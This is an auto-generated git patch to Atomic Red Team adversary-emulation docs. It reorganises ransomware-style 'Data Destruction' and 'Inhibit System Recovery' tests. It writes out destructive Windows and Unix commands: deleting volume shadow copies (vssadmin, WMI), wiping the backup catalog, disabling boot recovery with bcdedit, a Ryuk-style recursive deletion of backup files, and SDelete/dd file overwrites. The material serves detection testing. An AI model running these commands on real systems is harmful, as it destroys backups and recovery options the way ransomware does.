From c4cd523a8dd1ddde4b78c06a968a08ba74fda7c3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 1 Apr 2020 00:05:53 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1485/T1485.md | 143 ++++++--------------------------------- atomics/T1490/T1490.md | 32 +++++++++ atomics/index.md | 9 +-- atomics/index.yaml | 95 +++++++++----------------- atomics/linux-index.md | 2 +- atomics/macos-index.md | 2 +- atomics/windows-index.md | 7 +- 7 files changed, 91 insertions(+), 199 deletions(-) diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 66d0d18b..f7b2f8b7 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a ## Atomic Tests -- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies) +- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete) -- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog) - -- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair) - -- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete) - -- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd) - -- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies -Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -vssadmin.exe delete shadows /all /quiet -``` - - - - - - -
-
- -## Atomic Test #2 - Windows - Delete Windows Backup Catalog -Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -wbadmin.exe delete catalog -quiet -``` - - - - - - -
-
- -## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair -Disables repair by the Windows Recovery Console on boot. -This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures -bcdedit.exe /set {default} recoveryenabled no -``` - -#### Cleanup Commands: -```cmd -bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures -bcdedit.exe /set {default} recoveryenabled yes -``` - - - - - -
-
- -## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete -Overwrites and deletes a file using Sysinternals SDelete. -Requires the download of either Sysinternals Suite or the individual SDelete utility. +## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete +Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in +the powershell session along with other information about the file that was deleted. **Supported Platforms:** Windows @@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe| +| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe| +| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt| #### Attack Commands: Run with `powershell`! ```powershell -New-Item $env:TEMP\T1485.txt -#{sdelete_exe} -accepteula $env:TEMP\T1485.txt +Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ``` @@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt ##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{sdelete_exe}) {0} else {1} +if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force -New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null -Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force +Remove-Item $env:TEMP\SDelete.zip -Force +``` +##### Description: The file to delete must exist at #{file_to_delete} +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +New-Item #{file_to_delete} -Force | Out-Null ``` @@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force

-## Atomic Test #5 - macOS/Linux - Overwrite file with DD +## Atomic Test #2 - macOS/Linux - Overwrite file with DD Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. @@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source} -
-
- -## Atomic Test #6 - Windows - Delete Backup Files -Deletes backup files in a manner similar to Ryuk ransomware. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 -``` - - - - - -
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 1cf97717..d0bf8477 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or - [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell) +- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no ``` +#### Cleanup Commands: +```cmd +bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures +bcdedit.exe /set {default} recoveryenabled yes +``` @@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} +
+
+ +## Atomic Test #6 - Windows - Delete Backup Files +Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try +to delete files from around the system. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk +``` + + + + + +
diff --git a/atomics/index.md b/atomics/index.md index 41e1d47b..ddddc195 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -493,12 +493,8 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -511,6 +507,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux] diff --git a/atomics/index.yaml b/atomics/index.yaml index 59b3f4a8..88e41b50 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -15971,73 +15971,39 @@ impact: modified: '2019-07-19T14:34:28.595Z' identifier: T1485 atomic_tests: - - name: Windows - Delete Volume Shadow Copies - description: 'Deletes Windows Volume Shadow Copies. This technique is used by - numerous ransomware families and APT malware such as Olympic Destroyer. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'vssadmin.exe delete shadows /all /quiet - -' - - name: Windows - Delete Windows Backup Catalog - description: 'Deletes Windows Backup Catalog. This technique is used by numerous - ransomware families and APT malware such as Olympic Destroyer. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'wbadmin.exe delete catalog -quiet - -' - - name: Windows - Disable Windows Recovery Console Repair - description: | - Disables repair by the Windows Recovery Console on boot. - This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures - bcdedit.exe /set {default} recoveryenabled no - cleanup_command: | - bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures - bcdedit.exe /set {default} recoveryenabled yes - name: Windows - Overwrite file with Sysinternals SDelete description: | - Overwrites and deletes a file using Sysinternals SDelete. - Requires the download of either Sysinternals Suite or the individual SDelete utility. + Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in + the powershell session along with other information about the file that was deleted. supported_platforms: - windows input_arguments: sdelete_exe: description: Path of sdelete executable type: Path - default: PathToAtomicsFolder\T1485\bin\sdelete.exe + default: "$env:TEMP\\Sdelete\\sdelete.exe" + file_to_delete: + description: Path of file to delete + type: path + default: "$env:TEMP\\T1485.txt" dependency_executor_name: powershell dependencies: - description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}' + prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}' get_prereq_command: |- Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force - New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null - Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force + Remove-Item $env:TEMP\SDelete.zip -Force + - description: 'The file to delete must exist at #{file_to_delete}' + prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 + }' + get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null' executor: name: powershell - command: | - New-Item $env:TEMP\T1485.txt - #{sdelete_exe} -accepteula $env:TEMP\T1485.txt + command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" + +' - name: macOS/Linux - Overwrite file with DD description: | Overwrites and deletes a file using DD. @@ -16058,19 +16024,6 @@ impact: name: bash command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} -' - - name: Windows - Delete Backup Files - description: 'Deletes backup files in a manner similar to Ryuk ransomware. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* - c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 - ' '': technique: @@ -16250,6 +16203,9 @@ impact: command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no + cleanup_command: | + bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures + bcdedit.exe /set {default} recoveryenabled yes - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell description: | Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. @@ -16263,6 +16219,19 @@ impact: elevation_required: true command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} +' + - name: Windows - Delete Backup Files + description: | + Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try + to delete files from around the system. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* + c:\backup*.* c:\*.set c:\*.win c:\*.dsk + ' T1496: technique: diff --git a/atomics/linux-index.md b/atomics/linux-index.md index b698d0ab..d900a71f 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -39,7 +39,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 4f6557a3..5cf8dce9 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -56,7 +56,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 15cdc6f1..c64363d7 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -356,11 +356,7 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -373,6 +369,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)